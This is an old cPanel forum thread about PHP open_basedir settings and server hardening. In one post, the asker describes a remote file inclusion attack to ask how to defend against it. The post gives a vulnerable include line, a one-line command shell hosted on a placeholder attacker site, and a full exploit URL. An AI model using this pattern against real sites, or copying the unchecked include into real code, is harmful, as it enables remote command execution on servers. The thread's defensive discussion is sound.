The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

php open_basedir

Discussion in 'Security' started by joel69, Aug 15, 2005.

  1. joel69

    joel69 Active Member

    Joined:
    Feb 17, 2005
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    East Vancouver, BC, Canada
    Hello. I have recently setup a shiny new cPanel server and enabled php open_basedir protection. Then, I restarted apache, and created a file called phpinfo.php, with the contents:

    <? phpinfo(); ?>

    which displays the information about PHP. I created this file in one of the public_html folders for a newly created domain. Anyway, when I view this page on a browser, the value for open_basedir is "no value" under both the "Local Value" and "Master Value" columns. Is this right? How does this enhance security? :confused:

    Thanks.
     
  2. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    Check to make sure that you didn't exclude the domain you were testing. Also, go back to the Tweak Security settings and make sure you click the save button on the bottom. Just checking the box won't turn it on or change the settings. If that doesn't work try restarting httpd and see if the new setting take then.
     
  3. adept2003

    adept2003 Well-Known Member

    Joined:
    Aug 11, 2003
    Messages:
    283
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    ~ "/(extra|special)/data"
    It would probably show the output you're expecting if the account/domain had its own php.ini file. I believe phpinfo() output represents the php.ini serverwide, which is why it shows "no value" for open_basedir on that particular domain/account.
     
  4. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    I disagree. My phpinfo() shows a common php.ini no matter which domain I check and they all show where the open_basedir restricts as far as what they can open. Each domain is different yet they all point to the same ini file. Joel, I suspect a misconfiguration. Try running

    Code:
    /scripts/upcp --force
    
    and see if it cleans things up. If you don't see a value in open_basedir then its not in effect and there is no security as far as that goes. You can always try to test it by trying to open a directory that's not a part of your domain.
     
  5. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    Joel I was rummaging around my config files and I found where the open_basedir is set. Its not within the php.ini at all but within the httpd.conf file for each domain. Find your httpd.conf file and find:

    Code:
    <IfModule mod_php4.c>
    php_admin_value open_basedir "/home/<username>/:/usr/lib/php:/usr/local/lib/php:/tmp"
    </IfModule>
    
    This is added to each virtual host. If it isn't there then cPanel isn't creating the httpd.conf file correctly and it may warrant a support ticket to cPanel so they can help you straighten this out. I hope this helps.
     
  6. adept2003

    adept2003 Well-Known Member

    Joined:
    Aug 11, 2003
    Messages:
    283
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    ~ "/(extra|special)/data"
    As far as I'm aware, the open_basedir expression in the httpd.conf will only apply if you have php compiled as an apache module, and not CGI (suexec).
    Code:
    <IfModule mod_php4.c>
    php_admin_value open_basedir "/home/<username>/:/usr/lib/php:/usr/local/lib/php:/tmp"
    </IfModule>
    Specks - I suspect you have open_basedir enabled on a box with php compiled a an apache module, which is why open_basedir shows something.

    Joel69 - I suspect your server configuration is with php in CGI mode - hence the "no value" for open_basedir.
     
  7. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    That's true. That is the way I have it compiled.
     
  8. joel69

    joel69 Active Member

    Joined:
    Feb 17, 2005
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    East Vancouver, BC, Canada
    I have this in the /etc/httpd/conf/httpd.conf file (for each domain):

    Code:
    php_admin_value open_basedir "/home/mysite/:/usr/lib/php:/usr/local/lib/php:/tmp"
    Strange that it isn't showing up in the phpinfo() info. Does anybody know if this setting prevents this type of attack:

    Suppose a customer has some PHP code (called badcoder.php, for example), where this line is close to the top of the script:

    Code:
    include( $dir . "myfile.inc.php" );
    and, of course, the value of $dir is passed from script to script and not checked, register_globals is enabled, and safe_mode is disabled.

    An attacker then creates a file on another server at http://www.attackers-site.com/myfile.inc.php, which contans the code:

    Code:
    <? system( $cmd) ?>
    Then, the attacker calls the customers script directly, like this:

    http://www.customers-site.com/badcoder.php?dir=http://www.attackers-site.com/&cmd=whatever-command-I -feel-like-running.sh

    Which overrides the $dir variable so that the code on the attackers site is included, and the attacker can then run arbitrary commands (luckily as the user 'apache' and in a chroot jail, but still it is bad).

    Does settting the value of 'open_basedir' prevent code external to the server from being included? Perhaps I could set it to just / in the server's php.ini file, so that there is a global master setting for it, just to be sure code external to the server itself cannot be included.

    Thanks for your replies. :cool:
     
  9. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    No it won't prevent an attack like that. You'll need to install the mod_security module to stop that kind of attack. Not to mention never use that in programing anyways.
     
  10. joel69

    joel69 Active Member

    Joined:
    Feb 17, 2005
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    East Vancouver, BC, Canada
    Thanks for the reply Specks. I would never, under any curcumstances, write code like that (you'll notice I called the script 'badcoder.php'). Personally, I use $_SESSION['bla'] to pass information around between scripts. Unfortunately many other PHP coders do not do that, and many of our customers have downloaded their PHP scripts, and use them are part of their website.

    Do you think disabling register_globals would solve this problem completely (not to mention causing problems with a fair number of our customers websites)? Do you know of a guide or tutorial that would explain how to install and configure mod_security on a cPanel server?

    Thanks.
     
  11. Specks

    Specks Well-Known Member

    Joined:
    Jul 3, 2004
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    mod_security can be built as a module. Go to the mod_security web site and download the stable release.

    unzip the module and change your directory to where you unzipped it. The documents for mod_security are located here. Read it.

    Installation as a DSO is pretty easy and straight forward. The documentation tells you how to do it.
     
  12. carlospix

    carlospix Registered

    Joined:
    Nov 20, 2004
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Planet Earth
    register_globals ON is a major liability. If you have any doubts about this issue check this section of the PHP manual.
    I also recommend reading the entire security section and the entry regarding safe mode.
     
Loading...

Share This Page